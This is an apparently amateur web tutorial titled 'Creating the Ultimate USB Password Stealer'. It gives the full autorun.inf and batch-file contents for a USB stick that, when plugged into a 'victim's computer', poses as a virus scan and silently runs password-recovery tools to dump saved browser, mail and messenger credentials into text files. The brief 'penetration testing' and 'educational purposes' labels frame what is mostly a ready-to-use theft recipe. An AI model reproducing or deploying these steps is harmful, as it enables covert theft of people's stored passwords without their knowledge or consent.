Creating the Ultimate USB Password Stealer

 AUTORUN + PASSWORD STEALER : PLUG IN USB AND STEAL PASSWORDS

GUIDE FOR PENETRATION TESTING FOR USB BLOCKING


Windows allows the storage of the passwords . So does the modern browsers . Well this feature is for the convenience of the users , though has imposed itself as a big security risk among the organisations . As we know that Browsers stores most of its passwords on daily basis, Such as MSN messenger passwords, Yahoo passwords, Myspace passwords etc. Most of people have
lack of time and they had just asked their Browser/windows to save their passwords . As we know that there are many tools to recover Saved passwords, so in this article I will explain you on how to make a USB password stealer and steal saved passwords.

Just to explain the idea , we are going to collect some password stealing tools , these tools that are freely available on the internet wild and capable of stealing the stored passwords in the browsers or other windows files .

Then we create a Batch program that will execute these programs combined and store the stolen usernames and passwords in a text file .

To further spice up the penetration testing demonstration , we will also make this Batch file execute as an Auto-run for the USB stick . Basically stealing the passwords as we plug it in .

THINGS YOU WILL NEED

MessenPass – MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications.

~~~~Get it Here!~~~~

Mail PassView – Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express, windows mail, POP3 etc..

~~~~Get it Here!~~~~

IE Passview – IE passview is a small program that helps us view stored passwords in Internet explorer.

~~~~Get it Here!~~~~

Protected storage pass viewer(PSPV) – Protected Storage Passview is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

~~~~Get it Here!~~~~

Password Fox – Password fox is a small program used to view Stored passwords in Mozilla Firefox.

~~~~Get it Here!~~~~

ChromePass – ChromePass is a small password recovery tool that allows you to view the use

names and passwords stored by Google Chrome Web browser.

~~~~Get it Here! ~~~~

STEPS :

1.First of all download all 5 tools and copy the executables (.exe files) i.e. Copy the files mspass.exemailpv.exeiepv.exepspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it:

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

Save the Notepad and rename it from New Text “Document.txt” to “autorun.inf
Now copy the autoruninffile onto your USB pendrive.

3. Create another Notepad and write the following text onto
it:

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

4. Save the Notepad and rename it from New Text
Document.txt to launch.bat

5. Copy the launch.bat file also to your USB drive. Now your USB Password stealer is ready all you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Launch virus scan)

After this you can see saved password in .TXT files

Purely for the Educational Purposes . Use the tools at your own Risk !